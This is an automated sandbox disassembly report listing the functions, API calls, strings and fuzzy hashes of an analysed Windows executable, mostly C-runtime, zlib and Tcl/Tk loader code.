Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 569ffc40038bda92871681860ae47df8698c59a5521684fa61b4c36c5528688b
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: DC01DB21B6874140FA04DF529A0107DA691FFA9FE0F484632DE5C97BD6CF3CD4614B40

Function 00007FF6D9247EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9247F3A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction ID: 441d5312a6b54769215293b5f1f274e961caa9a630ca240c79868fabcb5c0fee
Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction Fuzzy Hash: 4D018020E3DA4380FEA05F21570117D11A8AF787D0F594637EA2CC36C6DF3CA4718A00

Function 00007FF6D9248238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9248251

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 429be8021d105144a4237815df3fc237a881e46aa0524804e300e03c3272dc7e
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 47E08C50E3CA4287FA117EA4078217D10A08FBD340F810532E908C62C3DD3C7C646F22

Function 00007FF6D924EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6D924B32A,?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A), ref: 00007FF6D924EBED

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 9477d20e8661042c6e9bac29a375efb6f97758bd41e5b65779943df224bdca7b
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: E3F09054F2960380FE586F659B513BC02846FACBA0F4C5533CD0FD63C1ED1CE4A18A10

Function 00007FF6D924D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6D9240C90,?,?,?,00007FF6D92422FA,?,?,?,?,?,00007FF6D9243AE9), ref: 00007FF6D924D63A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: c63de3cf6caa5425c5a37aa3f07e52fc2efbad24fbaf256dc8c56358c98ea91f
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: E0F08C10F3820380FE642F716B0137C12904FACBA0F080732DD2ECAAC6DE2CB4A08A10

Non-executed Functions

Function 00007FF6D92376C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6D92376D7
GetLastError.KERNEL32 ref: 00007FF6D92376E9
GetProcAddress.KERNEL32 ref: 00007FF6D9237725
GetLastError.KERNEL32 ref: 00007FF6D9237737
GetProcAddress.KERNEL32 ref: 00007FF6D9237750
GetLastError.KERNEL32 ref: 00007FF6D9237762
GetProcAddress.KERNEL32 ref: 00007FF6D923777B
GetLastError.KERNEL32 ref: 00007FF6D923778D
GetProcAddress.KERNEL32 ref: 00007FF6D92377A9
GetLastError.KERNEL32 ref: 00007FF6D92377BB
GetProcAddress.KERNEL32 ref: 00007FF6D92377D7
GetLastError.KERNEL32 ref: 00007FF6D92377E9
GetProcAddress.KERNEL32 ref: 00007FF6D9237805
GetLastError.KERNEL32 ref: 00007FF6D9237817
GetProcAddress.KERNEL32 ref: 00007FF6D9237833
GetLastError.KERNEL32 ref: 00007FF6D9237845
GetProcAddress.KERNEL32 ref: 00007FF6D9237861
GetLastError.KERNEL32 ref: 00007FF6D9237873

Strings

Tcl_FinalizeThread, xrefs: 00007FF6D92377CD, 00007FF6D92377EF
Tk_GetNumMainWindows, xrefs: 00007FF6D9237CA7, 00007FF6D9237CC9
Failed to get address for %hs, xrefs: 00007FF6D92376F8
Tcl_JoinThread, xrefs: 00007FF6D9237885, 00007FF6D92378A7
Tcl_FindExecutable, xrefs: 00007FF6D9237746, 00007FF6D9237768
Tcl_Alloc, xrefs: 00007FF6D9237C1D, 00007FF6D9237C3F
Tcl_CreateThread, xrefs: 00007FF6D9237829, 00007FF6D923784B
GetProcAddress, xrefs: 00007FF6D92376FF
Tcl_EvalFile, xrefs: 00007FF6D9237B93, 00007FF6D9237BB5
Tcl_MutexFinalize, xrefs: 00007FF6D923790F, 00007FF6D9237931
Tk_Init, xrefs: 00007FF6D9237C79, 00007FF6D9237C9B
Tcl_ConditionFinalize, xrefs: 00007FF6D923793D, 00007FF6D923795F
Tcl_Free, xrefs: 00007FF6D9237C4B, 00007FF6D9237C6D
Tcl_NewByteArrayObj, xrefs: 00007FF6D9237B09, 00007FF6D9237B2B
Tcl_Finalize, xrefs: 00007FF6D923779F, 00007FF6D92377C1
Tcl_EvalEx, xrefs: 00007FF6D9237BC1, 00007FF6D9237BE3
Tcl_DeleteInterp, xrefs: 00007FF6D92377FB, 00007FF6D923781D
Tcl_GetObjResult, xrefs: 00007FF6D9237B65, 00007FF6D9237B87
Tcl_DoOneEvent, xrefs: 00007FF6D9237771, 00007FF6D9237793
Tcl_SetVar2Ex, xrefs: 00007FF6D9237B37, 00007FF6D9237B59
Tcl_ThreadQueueEvent, xrefs: 00007FF6D92379C7, 00007FF6D92379E9
Tcl_CreateInterp, xrefs: 00007FF6D923771B, 00007FF6D923773D
Tcl_NewStringObj, xrefs: 00007FF6D9237ADB, 00007FF6D9237AFD
Tcl_ConditionWait, xrefs: 00007FF6D9237999, 00007FF6D92379BB
Tcl_ConditionNotify, xrefs: 00007FF6D923796B, 00007FF6D923798D
Tcl_GetString, xrefs: 00007FF6D9237AAD, 00007FF6D9237ACF
Tcl_SetVar2, xrefs: 00007FF6D9237A51, 00007FF6D9237A73
Tcl_CreateObjCommand, xrefs: 00007FF6D9237A7F, 00007FF6D9237AA1
Tcl_EvalObjv, xrefs: 00007FF6D9237BEF, 00007FF6D9237C11
Tcl_GetCurrentThread, xrefs: 00007FF6D9237857, 00007FF6D9237879
Tcl_MutexLock, xrefs: 00007FF6D92378B3, 00007FF6D92378D5
Tcl_ThreadAlert, xrefs: 00007FF6D92379F5, 00007FF6D9237A17
Tcl_MutexUnlock, xrefs: 00007FF6D92378E1, 00007FF6D9237903
Tcl_Init, xrefs: 00007FF6D92376D0, 00007FF6D92376EF
Tcl_GetVar2, xrefs: 00007FF6D9237A23, 00007FF6D9237A45

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 6cb50843e563d7b5e915bd15e72e3fedfb2ba2608b775d4b0bf6ac12ceb2287d
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 1D02D720E2EB4791FE949F65AE1467D23A5AF04744F840537D42EC3668EF3CB5B9C201

Function 00007FF6D92540AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6D92540FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9254766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92548DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9254B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9254DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9254FF7
memcpy_s.LIBCPMT ref: 00007FF6D92550D2
memcpy_s.LIBCPMT ref: 00007FF6D925517D
memcpy_s.LIBCPMT ref: 00007FF6D925524C

Strings

1#QNAN, xrefs: 00007FF6D9254213
1#IND, xrefs: 00007FF6D92541E7
1#INF, xrefs: 00007FF6D9254223
1#SNAN, xrefs: 00007FF6D925420A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: 2d7b1401de19553c93f698fe0540ebd8f99e4aef5ed0fee8a0962482b6b2ab05
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: A4B2C372A282828BF7A58E65D640BFD77A1FB54388F505136DA4DD7A8CDF38E910CB40

Function 00007FF6D923ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid code lengths set, xrefs: 00007FF6D923AE2D
invalid literal/length code, xrefs: 00007FF6D923B3E2
too many length or distance symbols, xrefs: 00007FF6D923AE46
invalid literal/lengths set, xrefs: 00007FF6D923B133
invalid distance code, xrefs: 00007FF6D923B5B4
invalid code -- missing end-of-block, xrefs: 00007FF6D923B0C6
invalid bit length repeat, xrefs: 00007FF6D923B099
invalid distance too far back, xrefs: 00007FF6D923B670
invalid distances set, xrefs: 00007FF6D923B1A0

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction ID: cc6d3c0ec3a04b84c3565139a6f4b1b3e386113f4e14d464f5322127d7fad52f
Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction Fuzzy Hash: C852C572A286A54BE7A49F25D658B7E3BA9FB44340F01413EE64AC7780DF3DD854CB40

Function 00007FF6D923D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6D923D148
RtlCaptureContext.KERNEL32 ref: 00007FF6D923D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D923D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D923D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF6D923D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D923D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D923D24C

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 0eecc480af1d0aee5e7b8db0bd0ba2fcc1b866224ada0cd5470bac8efe88fba8
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 85313D76628B8186FB609F60E8807FE7364FB84748F44413ADA4E87B99DF78D558C710

Function 00007FF6D924A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6D924A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D924A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D924A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF6D924A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D924A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D924A72E

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: e519d3a1e7caf0731581d6c79d594e044b2ee9acab735132a58381ef6b9602b2
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: E7319336628F8186EB60CF25E9402BE73A4FB98754F540136EA9D87B98DF3CC565CB00

Function 00007FF6D9251874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92518C0
FindFirstFileExW.KERNEL32 ref: 00007FF6D92519CA

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 3ae473b9a9590a896a80b59a4853aa667daaff68c369aa101a7e86ea5be2b675
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 65B1A322B3869241FEA19F2696015BD63A1EF54BE4F445133EA5D87BCEEE3CE461C700

Function 00007FF6D923D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6D923D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF6D923D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF6D923D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF6D923D066

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 8968077e2fbc1cf2d5bc511256c96cc84c14ead1baedd462de2cd83f0469761f
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 0C111C22B25B05CAFB408F70E9542BD33A4FB59758F440E36DA6D86BA8EF78D164C340

Function 00007FF6D9253C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6D9253C76
memcpy_s.LIBCPMT ref: 00007FF6D9253CA1

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 21c307ec371bdfb82dfd17aeaeac590b0dcd9ea842079c6bd40bc2d6ec8b7cc7
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: E2C12672B2928687E764CF15A14467EB7A1FB94B84F509136DB4E83748DF3DE910CB40

Function 00007FF6D923A474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF6D923A921
, xrefs: 00007FF6D923A55B
unknown header flags set, xrefs: 00007FF6D923A4C5

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction ID: 43629fd17dbb559ff9f87ec24accf57516e22d294e7b3c6275c32a31828c9371
Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction Fuzzy Hash: 68F19272A283C58BF7A5AF25C188B3E3AA9EF44740F05463EDA4997790CF38E551CB40

Function 00007FF6D9259728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6D9259977
RaiseException.KERNEL32 ref: 00007FF6D9259988

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: 7d6140037b8c18af8f8a641ec3b5d698bc2e468e52c4d8583840960c046e77ba
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: FEB15C7BA14B898BEB55CF29C94636C3BB0F744B48F588922DA5D837A8CF39D461C700

Function 00007FF6D92439A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6D9243B12
, xrefs: 00007FF6D9243D54

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

